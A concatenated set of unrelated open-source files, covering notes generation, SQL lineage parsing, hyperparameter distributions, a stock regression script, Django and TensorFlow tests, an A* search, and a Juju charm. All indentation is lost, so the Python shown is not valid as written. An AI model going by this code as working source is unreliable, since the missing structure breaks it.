with open(problemsPath+"/"+pFile+".json",'r') as fp:
k = json.load(fp)
pContent = k['contentHTML']
p_md = pypandoc.convert_text(pContent,'markdown_strict',format='html')
if len(combined)!=0:
combined+= "\n---\n"
combined += p_md
sol_md=""
# check if notes or sol exists
nFile = pFile.replace("-","_")
nPath = "solutions/"+tDir+"/"+nFile+"/n_"+nFile+".md"
sPath = "solutions/"+tDir+"/"+nFile+"/s_"+nFile+".md"
if os.path.exists(nPath):
with open(nPath,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = '\n\n??? note "Notes"\n' + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
combined += ks
if os.path.exists(sPath):
print("adding sol")
with open(sPath,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = '\n\n??? success "Solution"\n' + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
combined += ks
targetTopic=meta[tDir]
with open(targetPath+"/"+targetTopic+"/"+targetTopic+".md",'w') as fp:
fp.write(combined)
def store_notes(topic,problem,sol_file):
pName = problem.replace("-","_")
with open(sol_file,'r') as fp:
data = fp.read()
with open("meta.json",'r') as fp:
meta = json.load(fp)
tDir = meta[topic]['name']
if not os.path.exists("sol/"+tDir):
os.system("mkdir -p sol/"+tDir)
ibHome="https://www.interviewbit.com/problems/"
banner = "**Problem: ["+problem+"]("+ibHome+problem+")**\n\n"
dic = {}
dic['notes'] = banner+data
dic['solution'] = ""
with open("sol/"+tDir+"/n_"+pName+".json",'w') as fp:
json.dump(dic,fp)
if __name__=="__main__":
# f1 = sys.argv[1]
# f2 = sys.argv[2]
# f3 = sys.argv[3]
# combine_md(f1,f2)
# append_sol_md(f1,f2,f3)
base=sys.argv[1]
tar=sys.argv[2]
sortKey=sys.argv[3]
# store_notes(topic,prob,sol_file)
gen_combined_notes(base,tar) |
the-stack_0_19909 | from sqlparse.sql import Case, Function, Identifier, IdentifierList, Operation, Token
from sqlparse.tokens import Wildcard
from sqllineage.core.handlers.base import NextTokenBaseHandler
from sqllineage.exceptions import SQLLineageException
from sqllineage.holders import SubQueryLineageHolder
from sqllineage.models import Column
class ColumnHandler(NextTokenBaseHandler):
def __init__(self):
self.columns = []
super().__init__()
def _indicate(self, token: Token) -> bool:
# OVER here is to handle window function like row_number()
return token.normalized in ("SELECT", "OVER")
def _handle(self, token: Token, holder: SubQueryLineageHolder) -> None:
column_token_types = (Identifier, Function, Operation, Case)
if isinstance(token, column_token_types) or token.ttype is Wildcard:
column_tokens = [token]
elif isinstance(token, IdentifierList):
column_tokens = [
sub_token
for sub_token in token.tokens
if isinstance(sub_token, column_token_types)
]
else:
# SELECT constant value will end up here
column_tokens = []
for token in column_tokens:
self.columns.append(Column.of(token))
def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
tgt_tbl = None
if holder.write:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
if tgt_tbl:
for tgt_col in self.columns:
tgt_col.parent = tgt_tbl
for src_col in tgt_col.to_source_columns(holder.alias_mapping):
holder.add_column_lineage(src_col, tgt_col)
|
the-stack_0_19910 | from abc import ABC, abstractmethod
from . import graph as g
from .utils import export, MsgPackEncoders
import numpy as np
import copy
import math
import msgpack
import pandas as pd
def dump_tweaks(source: [dict, g.Graph]):
"""
Pretty-print a table of tweaks
:param source: A dict containing tweaks or a graph
:return:
"""
if isinstance(source, g.Graph):
source = source.get_tweaks_config()
if not isinstance(source, dict):
raise ValueError()
source = list(source.items())
with pd.option_context('display.max_rows', None, 'max_colwidth', 120):
print(pd.DataFrame.from_records(source, columns=('tweak_id', 'config')))
@export
class Distribution(ABC):
def __init__(self, space_descriptor, name=None):
"""
The constructor
:param space_descriptor: A dictionary containing a descriptor of the distribution's space
:param name: The name of the distribution. If not specified then the class name is used instead. This
identifier is mainly used for debug purposes.
"""
self._space_descriptor = space_descriptor
# The group property is used to assemble different sets of distributions. This is used for example
# in cgp to assign different probabilities to different groups of distributions.
self.group = None
if name is None:
name = type(self).__name__
self.name = name
@abstractmethod
def sample(self):
pass
@property
def space_descriptor(self):
"""
Return the space descriptor for the current distribution. The descriptor is a dictionary with the following
form: {'type': <type>, 'size': <size>}, where <type> can be either 'categorical' or 'continuous' and <size>
is the shape of the space.
:return: A dictionary containing the descriptor
"""
return copy.copy(self._space_descriptor)
def __repr__(self):
return str({'type': self.name, 'space': self._space_descriptor})
# TODO g.Graph.adapters[FuncTweaksDecl] = None
@export
def decl_tweaks(**key_tweak_pairs):
"""
A decorator to be used to associate tweaks to a function declaration. Also the function is 'marked' as graph's node
:param key_tweak_pairs:
:return:
"""
def real_decorator(function):
if isinstance(function, g.FuncTweaksDecl):
wrapper = function
else:
wrapper = g.FuncTweaksDecl(function=function, prefix=function.__name__)
wrapper.tweaks_config.update(key_tweak_pairs)
return wrapper
return real_decorator
class Aggregation(Distribution):
def __init__(self, base: Distribution, size):
"""
An aggregation of independent random variables of the same type
:param base: The base distribution to be used for each variable
:param size: The shape of the space containing the random variables following the distribution
of the parameter base
"""
if isinstance(base, Aggregation):
raise ValueError('The base distribution of an Aggregation cannot be an Aggregation itself')
self.base = base
self.size = size
super().__init__(space_descriptor={'type': base.space_descriptor['type'], 'size': size})
def sample(self):
count = np.product(self.size)
base = self.base
output = [base.sample() for _ in range(count)]
return np.reshape(output, self.size)
def mutation(self, current_value, prob):
"""
A specific helper for genetic algorithms. A subset of the aggregated variables is selected with
probability prob and mutation is applied by resampling the generated values from the base distribution.
:param current_value:
:param prob: A float or list of floats representing the probability of mutation. When prob is a list, then
it represents individual probabilities of mutation for each gene.
:return:
"""
selection = np.where(np.random.uniform(size=self.size) < prob)
current_value[selection] = self.base.sample_multiple(size=(len(selection[0]), ))
return current_value
@export
class Constant(Distribution):
def __init__(self, value):
"""
A Dummy distribution that returns a constant value
:param value: The constant value returned by the distribution
"""
self.value = value
super().__init__(space_descriptor={'type': 'categorical', 'size': 1})
def sample(self):
return self.value
@export
class UniformChoice(Distribution):
def __init__(self, values=(), group=None):
values = list(values)
self.values = values
self.gen = lambda: np.random.choice(values)
super().__init__(space_descriptor={'type': 'categorical', 'size': len(values)})
self.group = group
def sample(self):
return self.gen()
def sample_multiple(self, size):
return np.random.choice(self.values, size=size)
@export
class UniformPermutation(Distribution):
def __init__(self, values, k=None):
"""
Random permutation of elements from parameter values into groups of size k.
:param values:
:param k: The number of elements of a permutation. If k is None the k is assumed len(values).
"""
values = list(values)
n = len(values)
if k is None:
k = n
if not isinstance(k, int):
raise ValueError()
if k > n:
raise ValueError()
self.k = k
self.values = values
size = math.factorial(n) // math.factorial(n-k)
super().__init__(space_descriptor={'type': 'categorical', 'size': size})
def sample(self):
values = self.values
if self.k == len(values):
return list(np.random.permutation(values))
idxs = np.random.permutation(len(values))[:self.k]
return [values[idx] for idx in idxs]
def _qround(n, q):
return int(np.round(n/q)*q)
@export
class QUniform(Distribution):
def __init__(self, low=0, high=16, q=1.0, size=None, group=None):
if not isinstance(low, int) or not isinstance(high, int):
raise ValueError()
self.range = (low, high)
self.q = q
self.size = size
if q == 1.0:
self.gen = lambda: int(np.random.randint(low=low, high=high+1, size=size))
else:
self.gen = lambda: int(np.round(np.random.uniform(low=low, high=high, size=size) / q) * q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (_qround(low, q=q), _qround(high, q=q))})
self.group = group
def sample(self):
return self.gen()
@export
class QNormal(Distribution):
def __init__(self, mean=0, stddev=1.0, q=1.0, size=None):
self.gen = lambda: int(np.round(np.random.normal(loc=mean, scale=stddev, size=size) / q) * q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@export
class Uniform(Distribution):
def __init__(self, low=.0, high=1.0, size=None):
self.range = (low, high)
self.size = size
self.gen = lambda: np.random.uniform(low=low, high=high, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (low, high)})
def sample(self):
return self.gen()
def sample_multiple(self, size):
r = self.range
return np.random.uniform(low=r[0], high=r[1], size=size)
def clip(self, v):
r = self.range
return np.clip(v, a_min=r[0], a_max=r[1])
@export
class Normal(Distribution):
def __init__(self, mean=0, stddev=1.0, size=None):
self.mean = mean
self.stddev = stddev
self.gen = lambda: np.random.normal(loc=mean, scale=stddev, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@staticmethod
def clip(v):
return v
@export
class Poisson(Distribution):
def __init__(self, lam=1.0, size=None):
self.gen = lambda: np.random.poisson(lam=lam, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (0, np.inf)})
def sample(self):
return self.gen()
@export
class LogUniform(Distribution):
def __init__(self, low=np.finfo(float).tiny, high=1.0, size=None):
# TODO validate params
self.gen = lambda: np.exp(np.random.uniform(low=np.log(low), high=np.log(high), size=size))
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (low, high)})
def sample(self):
return self.gen()
@export
class LogNormal(Distribution):
def __init__(self, mean=0, stddev=1.0, size=None):
self.gen = lambda: np.exp(np.random.normal(loc=mean, scale=stddev, size=size))
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@export
class QLogUniform(Distribution):
def __init__(self, low=1, high=100, q=1.0, size=None):
self.gen = lambda: int(np.round(np.exp(np.random.uniform(low=np.log(low), high=np.log(high), size=size))/q)*q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (_qround(low, q=q), _qround(high, q=q))})
def sample(self):
return self.gen()
class Sample(g.Node):
def __init__(self, distribution: Distribution, default=None, name=None):
if not isinstance(distribution, Distribution):
raise ValueError()
self.distribution = distribution
self.default = default
super().__init__(name)
def get_hpopt_config_ranges(self):
return {self.fully_qualified_name: self.distribution}
def __call__(self, input, hpopt_config={}):
return hpopt_config.get(self.fully_qualified_name, self.default)
class Switch(g.Node):
"""
A node that acts as a switch. One of the inputs is selected and returned. The selection is driven by a tweak that is
published by this node. During runtime (in the graph context) only the active path is executed, the nodes on the
dead paths are ignored that is they are not executed.
"""
def __init__(self, default=None, name=None, distribution_group=None):
# TODO allow different probabilities for different inputs
self.default = default
self.distribution_group = distribution_group
super().__init__(name)
def get_hpopt_config_ranges(self):
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
if input_binding is None:
return {}
if isinstance(input_binding, dict):
return {self.fully_qualified_name: UniformChoice(input_binding.keys(), group=self.distribution_group)}
return {self.fully_qualified_name: QUniform(high=len(input_binding)-1, group=self.distribution_group)}
def get_input_binding(self, hpopt_config={}):
choice = hpopt_config.get(self.fully_qualified_name, self.default)
if choice is None:
return None
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
assert input_binding is not None
return input_binding[choice]
def __call__(self, input, hpopt_config={}):
# the selection is performed in the get_input_binding so here we simply return the input
return input
class Permutation(g.Node):
def __init__(self, size=None, name=None):
if size is not None and size <= 0:
raise ValueError()
self.size = size
super().__init__(name)
def get_hpopt_config_ranges(self):
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
if input_binding is None:
return {}
if isinstance(input_binding, dict):
return {self.fully_qualified_name: UniformPermutation(k=self.size, values=input_binding.keys())}
return {self.fully_qualified_name: UniformPermutation(k=self.size, values=range(len(input_binding)))}
def get_input_binding(self, hpopt_config={}):
selection = hpopt_config.get(self.fully_qualified_name)
if selection is None:
return None
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
assert input_binding is not None
return [input_binding[key] for key in selection]
def __call__(self, input, hpopt_config={}):
# the selection is performed in the get_input_binding so here we simply return the input
return input
@export
def switch(*, default=None, name=None, distribution_group=None) -> g.Node:
return Switch(name=name, default=default, distribution_group=distribution_group)
# TODO switch_call
@export
def permutation(*, size=None, name=None) -> g.Node:
return Permutation(size=size, name=name)
@export
def tweak(value, *, default=None, name=None) -> g.Node:
# TODO declare "level", that is, when the tweak is applied (eg. runtime)
if isinstance(value, Distribution):
return Sample(distribution=value, name=name, default=default)
raise ValueError("Input type not supported")
class TweaksSerializer:
@staticmethod
def save(obj, stream):
if not isinstance(obj, dict):
raise ValueError()
output = {}
for key, value in obj.items():
if hasattr(value, '_hg_tweak_descriptor'):
value = getattr(value, '_hg_tweak_descriptor')
output[key] = value
msgpack.pack(output, stream, use_bin_type=True, default=MsgPackEncoders.encode)
@staticmethod
def load(stream, graph=None):
tweaks = msgpack.unpack(stream, object_hook=MsgPackEncoders.decode, raw=False)
if graph is not None:
graph.resolve_tweaks(tweaks)
return tweaks
|
the-stack_0_19911 | from sys import version
from setuptools import find_packages, setup
if version[0] == "2":
from itertools import imap as map, ifilter as filter
from ast import parse
from distutils.sysconfig import get_python_lib
from functools import partial
from os import listdir, path
if __name__ == "__main__":
package_name = "offregister_python"
with open(path.join(package_name, "__init__.py")) as f:
__author__, __version__ = map(
lambda buf: next(map(lambda e: e.value.s, parse(buf).body)),
filter(
lambda line: line.startswith("__version__")
or line.startswith("__author__"),
f,
),
)
to_funcs = lambda *paths: (
partial(path.join, path.dirname(__file__), package_name, *paths),
partial(path.join, get_python_lib(prefix=""), package_name, *paths),
)
_data_join, _data_install_dir = to_funcs("_data")
_config_join, _config_install_dir = to_funcs("_config")
setup(
name=package_name,
author=__author__,
version=__version__,
description="Python deployment module for Fabric (offregister)",
classifiers=[
"Development Status :: 7 - Inactive",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: OSI Approved :: MIT License",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
],
install_requires=["pyyaml", "fab-classic", "paramiko"],
test_suite=package_name + ".tests",
packages=find_packages(),
package_dir={package_name: package_name},
data_files=[
(_data_install_dir(), list(map(_data_join, listdir(_data_join())))),
(_config_install_dir(), list(map(_config_join, listdir(_config_join())))),
],
)
|
the-stack_0_19913 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso
from sklearn.tree import DecisionTreeRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
__author__ = "Fengming Liu"
__status__ = "Development"
def regressor_run(reg, name, x_train, x_test, y_train, y_test):
reg.fit(x_train,y_train)
y_pred = reg.predict(x_test)
print(name)
print("R2:", r2_score(y_test, y_pred))
# print("RMSE:", mean_squared_error(y_test, y_pred))
plt.plot(y_test, label='true')
plt.plot(y_pred, label='pred')
plt.legend()
plt.title(name)
plt.show()
return r2_score(y_test, y_pred)
company_list = ["apple", "amazon", "facebook", "google", "microsoft", "netflix", "tesla"]
features_list = [["relative_day"],
["past_3_days_senti_avg"],
["past_7_days_senti_avg"],
["1_day_sentiment_score"],
["1_day_news_count"],
["1_day_overall_sentiment_score"],
["relative_day", "past_3_days_senti_avg"],
["relative_day", "past_7_days_senti_avg"]
]
response_list = ["high", "low", "open", "close", "volume"]
result = open("./basic_models_results.csv", "a")
alg_dict = {"KNN": KNeighborsRegressor(),
"DecisionTree": DecisionTreeRegressor(),
# "Linear": LinearRegression(),
# "Ridge": Ridge(),
# "Lasso": Lasso()
}
for response in response_list:
for features in features_list:
result.write("features:,")
for feat in features:
result.write(feat + ',')
result.write('\n')
result.write("response:," + response + '\n')
result.write(" ,KNN,DecisionTree,Linear,Ridge,Lasso\n")
for company in company_list:
total_df = pd.read_csv("./processed_data/{0}.csv".format(company))
x_train, x_test, y_train, y_test = train_test_split(total_df[features].to_numpy(),
total_df[response].to_numpy(dtype=np.float32),
test_size=0.3,
shuffle=True,
random_state=500)
result.write(company + ',')
for alg_name, reg in alg_dict.items():
print(alg_name)
print(features)
print(response)
Rsquared_score = regressor_run(reg, alg_name, x_train, x_test, y_train, y_test)
result.write(str(Rsquared_score))
result.write(',')
result.write('\n')
result.write('\n')
break
result.write('\n')
break
result.write('\n')
result.close()
|
the-stack_0_19915 | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""test that login is required for tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'[email protected]',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""test that tags are returned for the authenticated user"""
user2 = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='comfy food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tag_succesfull(self):
"""test creating a new tag"""
payload = {'name': 'Test tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
def test_create_tag_invalid(self):
"""test creating a new tag with invalid payload"""
payload= {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
|
the-stack_0_19916 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for data_provider."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
import data_provider
class DataProviderTest(tf.test.TestCase):
def _test_data_provider_helper(self, split_name):
dataset_dir = os.path.join(
tf.flags.FLAGS.test_srcdir,
'google3/third_party/tensorflow_models/gan/image_compression/testdata/')
batch_size = 3
patch_size = 8
images = data_provider.provide_data(
split_name, batch_size, dataset_dir, patch_size=8)
self.assertListEqual([batch_size, patch_size, patch_size, 3],
images.shape.as_list())
with self.test_session(use_gpu=True) as sess:
with tf.contrib.slim.queues.QueueRunners(sess):
images_out = sess.run(images)
self.assertEqual((batch_size, patch_size, patch_size, 3),
images_out.shape)
# Check range.
self.assertTrue(np.all(np.abs(images_out) <= 1.0))
def test_data_provider_train(self):
self._test_data_provider_helper('train')
def test_data_provider_validation(self):
self._test_data_provider_helper('validation')
if __name__ == '__main__':
tf.test.main()
|
the-stack_0_19917 | import heapq
import numpy as np
TPos = tuple[int, int]
class PriorityQueue:
def __init__(self):
self.elements = []
self.set = set()
def minkey(self):
if not self.empty():
return self.elements[0][0]
else:
return float("inf")
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
if item not in self.set:
heapq.heappush(self.elements, (priority, item))
self.set.add(item)
else:
# update
# print("update", item)
temp = []
(pri, x) = heapq.heappop(self.elements)
while x != item:
temp.append((pri, x))
(pri, x) = heapq.heappop(self.elements)
temp.append((priority, item))
for (pro, xxx) in temp:
heapq.heappush(self.elements, (pro, xxx))
def remove_element(self, item):
if item in self.set:
self.set.remove(item)
temp = []
(pro, x) = heapq.heappop(self.elements)
while x != item:
temp.append((pro, x))
(pro, x) = heapq.heappop(self.elements)
for (prito, yyy) in temp:
heapq.heappush(self.elements, (prito, yyy))
def top_show(self):
return self.elements[0][1]
def get(self):
(priority, item) = heapq.heappop(self.elements)
self.set.remove(item)
return (priority, item)
def consistent_heuristic(P: TPos, goal: TPos):
# euclidean distance
a = np.array(P)
b = np.array(goal)
return np.linalg.norm(a - b)
def heuristic_2(P: TPos, goal: TPos):
# integer division by time variable
return consistent_heuristic(P, goal) // t
def heuristic_1(P: TPos, goal: TPos):
# manhattan distance
return abs(P[0] - goal[0]) + abs(P[1] - goal[1])
def key(start: TPos, i: int, goal: TPos, g_function: dict[TPos, float]):
ans = g_function[start] + W1 * heuristics[i](start, goal)
return ans
def do_something(back_pointer, goal, start):
grid = np.chararray((n, n))
for i in range(n):
for j in range(n):
grid[i][j] = "*"
for i in range(n):
for j in range(n):
if (j, (n - 1) - i) in blocks:
grid[i][j] = "#"
grid[0][(n - 1)] = "-"
x = back_pointer[goal]
while x != start:
(x_c, y_c) = x
# print(x)
grid[(n - 1) - y_c][x_c] = "-"
x = back_pointer[x]
grid[(n - 1)][0] = "-"
for i in range(n):
for j in range(n):
if (i, j) == (0, n - 1):
print(grid[i][j], end=" ")
print("<-- End position", end=" ")
else:
print(grid[i][j], end=" ")
print()
print("^")
print("Start position")
print()
print("# is an obstacle")
print("- is the path taken by algorithm")
print("PATH TAKEN BY THE ALGORITHM IS:-")
x = back_pointer[goal]
while x != start:
print(x, end=" ")
x = back_pointer[x]
print(x)
quit()
def valid(p: TPos):
if p[0] < 0 or p[0] > n - 1:
return False
if p[1] < 0 or p[1] > n - 1:
return False
return True
def expand_state(
s,
j,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
):
for itera in range(n_heuristic):
open_list[itera].remove_element(s)
# print("s", s)
# print("j", j)
(x, y) = s
left = (x - 1, y)
right = (x + 1, y)
up = (x, y + 1)
down = (x, y - 1)
for neighbours in [left, right, up, down]:
if neighbours not in blocks:
if valid(neighbours) and neighbours not in visited:
# print("neighbour", neighbours)
visited.add(neighbours)
back_pointer[neighbours] = -1
g_function[neighbours] = float("inf")
if valid(neighbours) and g_function[neighbours] > g_function[s] + 1:
g_function[neighbours] = g_function[s] + 1
back_pointer[neighbours] = s
if neighbours not in close_list_anchor:
open_list[0].put(neighbours, key(neighbours, 0, goal, g_function))
if neighbours not in close_list_inad:
for var in range(1, n_heuristic):
if key(neighbours, var, goal, g_function) <= W2 * key(
neighbours, 0, goal, g_function
):
open_list[j].put(
neighbours, key(neighbours, var, goal, g_function)
)
def make_common_ground():
some_list = []
for x in range(1, 5):
for y in range(1, 6):
some_list.append((x, y))
for x in range(15, 20):
some_list.append((x, 17))
for x in range(10, 19):
for y in range(1, 15):
some_list.append((x, y))
# L block
for x in range(1, 4):
for y in range(12, 19):
some_list.append((x, y))
for x in range(3, 13):
for y in range(16, 19):
some_list.append((x, y))
return some_list
heuristics = {0: consistent_heuristic, 1: heuristic_1, 2: heuristic_2}
blocks_blk = [
(0, 1),
(1, 1),
(2, 1),
(3, 1),
(4, 1),
(5, 1),
(6, 1),
(7, 1),
(8, 1),
(9, 1),
(10, 1),
(11, 1),
(12, 1),
(13, 1),
(14, 1),
(15, 1),
(16, 1),
(17, 1),
(18, 1),
(19, 1),
]
blocks_all = make_common_ground()
blocks = blocks_blk
# hyper parameters
W1 = 1
W2 = 1
n = 20
n_heuristic = 3 # one consistent and two other inconsistent
# start and end destination
start = (0, 0)
goal = (n - 1, n - 1)
t = 1
def multi_a_star(start: TPos, goal: TPos, n_heuristic: int):
g_function = {start: 0, goal: float("inf")}
back_pointer = {start: -1, goal: -1}
open_list = []
visited = set()
for i in range(n_heuristic):
open_list.append(PriorityQueue())
open_list[i].put(start, key(start, i, goal, g_function))
close_list_anchor: list[int] = []
close_list_inad: list[int] = []
while open_list[0].minkey() < float("inf"):
for i in range(1, n_heuristic):
# print(open_list[0].minkey(), open_list[i].minkey())
if open_list[i].minkey() <= W2 * open_list[0].minkey():
global t
t += 1
if g_function[goal] <= open_list[i].minkey():
if g_function[goal] < float("inf"):
do_something(back_pointer, goal, start)
else:
_, get_s = open_list[i].top_show()
visited.add(get_s)
expand_state(
get_s,
i,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
)
close_list_inad.append(get_s)
else:
if g_function[goal] <= open_list[0].minkey():
if g_function[goal] < float("inf"):
do_something(back_pointer, goal, start)
else:
get_s = open_list[0].top_show()
visited.add(get_s)
expand_state(
get_s,
0,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
)
close_list_anchor.append(get_s)
print("No path found to goal")
print()
for i in range(n - 1, -1, -1):
for j in range(n):
if (j, i) in blocks:
print("#", end=" ")
elif (j, i) in back_pointer:
if (j, i) == (n - 1, n - 1):
print("*", end=" ")
else:
print("-", end=" ")
else:
print("*", end=" ")
if (j, i) == (n - 1, n - 1):
print("<-- End position", end=" ")
print()
print("^")
print("Start position")
print()
print("# is an obstacle")
print("- is the path taken by algorithm")
if __name__ == "__main__":
multi_a_star(start, goal, n_heuristic)
|
the-stack_0_19918 | """Send events via uds
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import socket
import time
from treadmill import osnoop
_LOGGER = logging.getLogger(__name__)
@osnoop.windows
def post_ipc(event, uds='/run/tm_ctl/appevents'):
"""Post events to UCSPI socket
Most use case is to send container event from inside container
"""
_LOGGER.debug('post: %s: %r', uds, event)
(
_ts,
_src,
instanceid,
event_type,
event_data,
_payload
) = event.to_data()
event_str = '{},{},{},{}'.format(
time.time(), instanceid, event_type, event_data
).encode()
sent = 0
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as u_sock:
try:
u_sock.connect(uds)
u_sock.sendall(event_str)
sent = len(event_str)
except ConnectionRefusedError:
_LOGGER.error('unable to connect %s', uds)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error('error to send event %s: %r', event_str, err)
return sent
|
the-stack_0_19922 | # Copyright 2020 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=unused-argument
from charms.reactive import when, when_not, set_state, remove_state
from charmhelpers.core import hookenv
from charms.layer.magpie_tools import check_nodes, safe_status, Iperf, Lldp
import charmhelpers.contrib.openstack.utils as os_utils
import charmhelpers.fetch as fetch
def _set_states(check_result):
if 'fail' in check_result['icmp']:
set_state('magpie-icmp.failed')
else:
remove_state('magpie-icmp.failed')
if 'fail' in check_result['dns']:
set_state('magpie-dns.failed')
else:
remove_state('magpie-dns.failed')
@when_not('charm.installed')
def install():
"""Configure APT source.
The many permutations of package source syntaxes in use does not allow us
to simply call `add-apt-repository` on the unit and we need to make use
of `charmhelpers.fetch.add_source` for this to be universally useful.
"""
source, key = os_utils.get_source_and_pgp_key(
hookenv.config().get('source', 'distro'))
fetch.add_source(source, key)
fetch.apt_update(fatal=True)
set_state('charm.installed')
@when('charm.installed')
@when_not('lldp.installed')
def install_lldp_pkg():
if hookenv.config().get('use_lldp'):
lldp = Lldp()
lldp.install()
lldp.enable()
set_state('lldp.installed')
@when('charm.installed')
@when_not('iperf.installed')
def install_iperf_pkg():
if hookenv.config().get('check_iperf'):
iperf = Iperf()
iperf.install_iperf()
set_state('iperf.installed')
@when_not('magpie.joined')
def no_peers():
safe_status('waiting', 'Waiting for peers...')
@when('magpie.joined')
@when_not('leadership.is_leader', 'iperf.checked')
def check_check_state(magpie):
'''
Servers should only update their status after iperf has checked them
'''
if magpie.get_iperf_checked():
for units in magpie.get_iperf_checked():
if units and hookenv.local_unit() in units:
set_state('iperf.checked')
@when('magpie.joined', 'leadership.is_leader')
@when_not('iperf.servers.ready')
def leader_wait_servers_ready(magpie):
'''
Don't do any iperf checks until the servers are listening
'''
nodes = sorted(magpie.get_nodes())
iperf_ready_nodes = sorted(magpie.check_ready_iperf_servers())
if nodes == iperf_ready_nodes:
set_state('iperf.servers.ready')
else:
remove_state('iperf.servers.ready')
@when('magpie.joined')
@when_not('leadership.is_leader', 'iperf.listening')
def listen_for_checks(magpie):
'''
If im not the leader, and im not listening, then listen
'''
iperf = Iperf()
iperf.listen()
magpie.set_iperf_server_ready()
set_state('iperf.listening')
@when('iperf.servers.ready', 'magpie.joined', 'leadership.is_leader')
def client_check_hosts(magpie):
'''
Once the iperf servers are listening, do the checks
'''
nodes = magpie.get_nodes()
_set_states(check_nodes(nodes, iperf_client=True))
magpie.set_iperf_checked()
@when('magpie.joined', 'iperf.checked')
@when_not('leadership.is_leader')
def check_all_node(magpie):
'''
Now that the iperf checks have been done, we can update our status
'''
nodes = magpie.get_nodes()
_set_states(check_nodes(nodes))
@when('prometheus-target.available')
def advertise_metric_port(target):
'''
Advertise prometheus metric port used during action execution
'''
target.configure(port="8088")
|
the-stack_0_19923 | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
